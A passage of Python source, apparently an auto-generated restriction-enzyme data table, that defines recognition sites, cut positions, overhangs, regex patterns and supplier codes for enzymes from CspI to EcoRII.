'charac': (2, -2, None, None, 'CGGWCCG'),
'compsite': '(?=(?P<CspI>CGG[AT]CCG))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGWCCG',
'size': 7,
'substrat': 'DNA',
'suppl': ('R',),
}
rest_dict['CspI'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'AAGGAG'),
'compsite': '(?=(?P<CstMI>AAGGAG))|(?=(?P<CstMI_as>CTCCTT))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AAGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CstMI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CATG'),
'compsite': '(?=(?P<CviAII>CATG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['CviAII'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGCY'),
'compsite': '(?=(?P<CviJI>[AG]GC[CT]))',
'dna': None,
'freq': 64.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCY',
'size': 4,
'substrat': 'DNA',
'suppl': ('Q', 'X'),
}
rest_dict['CviJI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGCY'),
'compsite': '(?=(?P<CviKI_1>[AG]GC[CT]))',
'dna': None,
'freq': 64.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCY',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['CviKI_1'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTAC'),
'compsite': '(?=(?P<CviQI>GTAC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAC',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['CviQI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TGCA'),
'compsite': '(?=(?P<CviRI>TGCA))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGCA',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['CviRI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCWGG'),
'compsite': '(?=(?P<Dde51507I>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Dde51507I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTNAG'),
'compsite': '(?=(?P<DdeI>CT.AG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTNAG',
'size': 5,
'substrat': 'DNA',
'suppl': ('K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['DdeI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGCGCC'),
'compsite': '(?=(?P<DinI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['DinI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GATC'),
'compsite': '(?=(?P<DpnI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'E', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['DpnI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<DpnII>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['DpnII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TTTAAA'),
'compsite': '(?=(?P<DraI>TTTAAA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTTAAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['DraI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGGNCCY'),
'compsite': '(?=(?P<DraII>[AG]GG.CC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGNCCY',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DraII'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CACNNNGTG'),
'compsite': '(?=(?P<DraIII>CAC...GTG))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNNNGTG',
'size': 9,
'substrat': 'DNA',
'suppl': ('I', 'M', 'N', 'V'),
}
rest_dict['DraIII'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'CAAGNAC'),
'compsite': '(?=(?P<DraRI>CAAG.AC))|(?=(?P<DraRI_as>GT.CTTG))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAAGNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DraRI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GACNNNNNNGTC'),
'compsite': '(?=(?P<DrdI>GAC......GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNNGTC',
'size': 12,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['DrdI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAACCA'),
'compsite': '(?=(?P<DrdII>GAACCA))|(?=(?P<DrdII_as>TGGTTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAACCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DrdII'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'TACGAC'),
'compsite': '(?=(?P<DrdIV>TACGAC))|(?=(?P<DrdIV_as>GTCGTA))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TACGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DrdIV'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GACNNNNNGTC'),
'compsite': '(?=(?P<DriI>GAC.....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNGTC',
'size': 11,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['DriI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCRYGG'),
'compsite': '(?=(?P<DsaI>CC[AG][CT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CRYG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCRYGG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DsaI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'GACNNNNNNGTC'),
'compsite': '(?=(?P<DseDI>GAC......GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNNGTC',
'size': 12,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['DseDI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACNCAC'),
'compsite': '(?=(?P<DvuIII>CAC.CAC))|(?=(?P<DvuIII_as>GTG.GTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNCAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['DvuIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'YGGCCR'),
'compsite': '(?=(?P<EaeI>[CT]GGCC[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YGGCCR',
'size': 6,
'substrat': 'DNA',
'suppl': ('K', 'N'),
}
rest_dict['EaeI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
'compsite': '(?=(?P<EagI>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['EagI'] = _temp()
def _temp():
return {
'charac': (7, 4, None, None, 'CTCTTC'),
'compsite': '(?=(?P<Eam1104I>CTCTTC))|(?=(?P<Eam1104I_as>GAAGAG))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCTTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eam1104I'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GACNNNNNGTC'),
'compsite': '(?=(?P<Eam1105I>GAC.....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNGTC',
'size': 11,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eam1105I'] = _temp()
def _temp():
return {
'charac': (7, 4, None, None, 'CTCTTC'),
'compsite': '(?=(?P<EarI>CTCTTC))|(?=(?P<EarI_as>GAAGAG))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCTTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['EarI'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'GGCGGA'),
'compsite': '(?=(?P<EciI>GGCGGA))|(?=(?P<EciI_as>TCCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['EciI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GAGCTC'),
'compsite': '(?=(?P<Ecl136II>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Ecl136II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGGNAAG'),
'compsite': '(?=(?P<Ecl234I>CGG.AAG))|(?=(?P<Ecl234I_as>CTT.CCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGNAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ecl234I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAAYTC'),
'compsite': '(?=(?P<Ecl35734I>GAAA[CT]TC))|(?=(?P<Ecl35734I_as>GA[AG]TTTC))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAAYTC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ecl35734I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
'compsite': '(?=(?P<EclXI>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('S',),
}
rest_dict['EclXI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TACGTA'),
'compsite': '(?=(?P<Eco105I>TACGTA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TACGTA',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco105I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCWWGG'),
'compsite': '(?=(?P<Eco130I>CC[AT][AT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CWWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWWGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco130I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGGCCT'),
'compsite': '(?=(?P<Eco147I>AGGCCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGCCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco147I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GRGCYC'),
'compsite': '(?=(?P<Eco24I>G[AG]GC[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'RGCY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco24I'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'GGTCTC'),
'compsite': '(?=(?P<Eco31I>GGTCTC))|(?=(?P<Eco31I_as>GAGACC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco31I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GATATC'),
'compsite': '(?=(?P<Eco32I>GATATC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATATC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco32I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRARCAG'),
'compsite': '(?=(?P<Eco43896II>C[AG]A[AG]CAG))|(?=(?P<Eco43896II_as>CTG[CT]T[CT]G))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRARCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Eco43896II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAABCC'),
'compsite': '(?=(?P<Eco4465II>GAAA[CGT]CC))|(?=(?P<Eco4465II_as>GG[ACG]TTTC))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAABCC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Eco4465II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGWCC'),
'compsite': '(?=(?P<Eco47I>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco47I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGCGCT'),
'compsite': '(?=(?P<Eco47III>AGCGCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCGCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'M', 'R', 'S'),
}
rest_dict['Eco47III'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
'compsite': '(?=(?P<Eco52I>CGGCCG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Eco52I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GAGCTC'),
'compsite': '(?=(?P<Eco53kI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Eco53kI'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTGAAG'),
'compsite': '(?=(?P<Eco57I>CTGAAG))|(?=(?P<Eco57I_as>CTTCAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco57I'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTGRAG'),
'compsite': '(?=(?P<Eco57MI>CTG[AG]AG))|(?=(?P<Eco57MI_as>CT[CT]CAG))',
'dna': None,
'freq': 2048.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Eco57MI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTG'),
'compsite': '(?=(?P<Eco72I>CACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco72I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTNAGG'),
'compsite': '(?=(?P<Eco81I>CCT.AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAGG',
'size': 7,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Eco81I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<Eco88I>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco88I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTNACC'),
'compsite': '(?=(?P<Eco91I>GGT.ACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTNAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTNACC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Eco91I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RCSRC'),
'compsite': '(?=(?P<EcoBLMcrX>[AG]C[CG][AG]C))|(?=(?P<EcoBLMcrX_as>G[CT][CG]G[CT]))',
'dna': None,
'freq': 128.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCSRC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoBLMcrX'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACCYAC'),
'compsite': '(?=(?P<EcoE1140I>ACC[CT]AC))|(?=(?P<EcoE1140I_as>GT[AG]GGT))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCYAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoE1140I'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCSGG'),
'compsite': '(?=(?P<EcoHI>CC[CG]GG))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCSGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCSGG',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoHI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGTAAG'),
'compsite': '(?=(?P<EcoHSI>GGTAAG))|(?=(?P<EcoHSI_as>CTTACC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoHSI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GAGCTC'),
'compsite': '(?=(?P<EcoICRI>GAGCTC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'R', 'V'),
}
rest_dict['EcoICRI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CANCATC'),
'compsite': '(?=(?P<EcoMVII>CA.CATC))|(?=(?P<EcoMVII_as>GATG.TG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CANCATC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoMVII'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CCTNNNNNAGG'),
'compsite': '(?=(?P<EcoNI>CCT.....AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNNNNNAGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['EcoNI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ATGAAG'),
'compsite': '(?=(?P<EcoNIH6II>ATGAAG))|(?=(?P<EcoNIH6II_as>CTTCAT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EcoNIH6II'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'RGGNCCY'),
'compsite': '(?=(?P<EcoO109I>[AG]GG.CC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGNCCY',
'size': 7,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'N'),
}
rest_dict['EcoO109I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTNACC'),
'compsite': '(?=(?P<EcoO65I>GGT.ACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTNAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTNACC',
'size': 7,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['EcoO65I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GAATTC'),
'compsite': '(?=(?P<EcoRI>GAATTC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAATTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['EcoRI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCWGG'),
'compsite': '(?=(?P<EcoRII>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
